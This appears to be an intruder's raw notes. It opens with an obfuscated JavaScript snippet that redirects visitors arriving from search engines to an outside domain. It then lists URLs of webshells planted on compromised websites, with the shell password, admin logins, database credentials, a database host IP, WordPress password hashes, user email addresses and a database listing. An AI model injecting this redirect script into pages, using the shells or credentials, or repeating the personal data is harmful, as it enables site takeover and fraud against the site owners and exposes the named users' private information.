广告js

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3 4=/\\.(t|f|g|d|e|j|k|h|5|i|6|c|b|8|5)(\\.[a-7-9\\-]+){1,2}\\//x;3 0=v.w;n(4.u(0)){l.o.r=\'q://p.m.s/\'}',34,34,'where|||var|regexp|biso|ifeng|z0|niuhu|||sooule|ivc|google|youdao|soso|baidu|118114|gougou|yahoo|bing|window|chinaigm|if|location|wl|https|href|net|sogou|test|document|referrer|ig'.split('|'),0,{}))
</script>

大马：密码cc11
http://www.businesswomansuccess.com/wp-content/plugins/bxxxckg/Teams.php
http://janshabd.com/wp-content/plugins/tijxypk/Teams.php
http://itjagat.com/wp-content/plugins/veqqwou/Teams.php     Admin   diamond
itjagat_data
itjagat_usserr
J=FUI#k^-G+{

http://design.rancang.web.id/wp-content/plugins/jstgjhc/Teams.php
http://justinbheller.com/wp-content/plugins/dqtpjjg/Teams.php?      Admin   diamond
h7592342670793
h7592342670793
d0}|M/HiWAK
db_host:68.178.253.8:3307

	troylarson	$P$BIu94Jc1Ok9K1AmLT2IHyiP7MQejO00	troylarson	troy.larson@mediawelldone.com		2014-12-06 00:15:29		0	troylarson
    	Admin	$P$B7bRIojxIXs3ULJNSkcEdImc70wD4P/	rootmeit	nightqueen007007@gmail.com		2013-01-18 11:58:23	1497385467:$P$BUxGSXlKc4KlyA/f83aN.G5Pf9i0C61	1	admin
	

http://www.dna-fun.com/news/uploads/141214/_btn.php?
[information_schema]  [a00102]  [a00138]  [a00163]  [a00166]  [a00167]  [a00168]  [a0070]  [a0101]  [a0103]  [a0104]  [a0106]  [a0109]  [a0110]  [a0111]  [a0112]  [a0114]  [a0117]  [a0118]  [a0119]  [a0121]  [a0123]  [a0124]  [a0125]  [a0126]  [a0129]  [a0130]  [a0131]  [a0133]  [a0135]  [a0136]  [a0137]  [a0138]  [a0140]  [a0141]  [a0142]  [a0143]  [a0144]  [a0148]  [a0149]  [a0150]  [a0153]  [a0154]  [a0157]  [a0159]  [a0160]  [a0161]  [a0163]  [a0165]  [a0166]  [a0167]  [a0168]  [a0169]  [a0170]  [a0171]  [a0172]  [a041]  [a042]  [a044]  [a045]  [a047]  [a048]  [a049]  [a0490]  [a050]  [a0500]  [a051]  [a052]  [a053]  [a054]  [a055]  [a056]  [a058]  [a059]  [a060]  [a062]  [a064]  [a065]  [a066]  [a067]  [a069]  [a070]  [a072]  [a074]  [a075]  [a076]  [a077]  [a078]  [a079]  [a080]  [a081]  [a082]  [a084]  [a085]  [a087]  [a088]  [a089]  [a090]  [a091]  [a092]  [a093]  [a094]  [a095]  [a100]  [a102]  [a105]  [a107]  [a108]  [a113]  [a115]  [a116]  [a120]  [a122]  [a127]  [a128]  [a132]  [a134]  [a139]  [a145]  [a146]  [a147]  [a151]  [a152]  [a155]  [a156]  [a158]  [a162]  [a164]  [a172]  [a39]  [a40]  [a41]  [a42]  [a44]  [a45]  [a46]  [a47]  [a48]  [a57]  [a61]  [a63]  [a68]  [a71]  [a73]  [a83]  [a86]  [a96]  [a97]  [a98]  [a99]  [blogs]  [k00158]  [k0042]  [k0045]  [k0046]  [k0047]  [k0048]  [k0102]  [k0158]  [k0163]  [k0164]  [k0165]  [k0166]  [k0167]  [k039]  [k040]  [k041]  [k044]  [k049]  [k086]  [k100]  [k101]  [k103]  [k104]  [k105]  [k106]  [k107]  [k108]  [k109]  [k110]  [k111]  [k112]  [k113]  [k114]  [k115]  [k116]  [k117]  [k118]  [k119]  [k120]  [k121]  [k122]  [k123]  [k124]  [k125]  [k126]  [k127]  [k128]  [k129]  [k130]  [k131]  [k132]  [k133]  [k134]  [k135]  [k136]  [k137]  [k138]  [k139]  [k140]  [k141]  [k142]  [k143]  [k144]  [k145]  [k146]  [k147]  [k148]  [k149]  [k150]  [k151]  [k152]  [k153]  [k154]  [k155]  [k156]  [k157]  [k159]  [k35]  [k36]  [k37]  [k38]  [k43]  [k50]  [k51]  [k52]  [k53]  [k54]  [k55]  [k56]  [k57]  [k58]  [k59]  [k60]  [k61]  [k62]  [k63]  [k64]  [k65]  [k66]  [k67]  [k68]  [k69]  [k70]  [k71]  [k72]  [k73]  [k74]  [k75]  [k76]  [k77]  [k78]  [k79]  [k80]  [k81]  [k82]  [k83]  [k84]  [k85]  [k86]  [k87]  [k88]  [k89]  [k90]  [k91]  [k92]  [k93]  [k94]  [k95]  [k96]  [k97]  [k98]  [k99]  [money]  [mysql]  [performance_schema]  [s45]  [shuaishuai]  [travel]  [travelgame]


http://www.gzssag.com/plus/class.php

http://www.zhaozhiren.com/plus/_btn.php?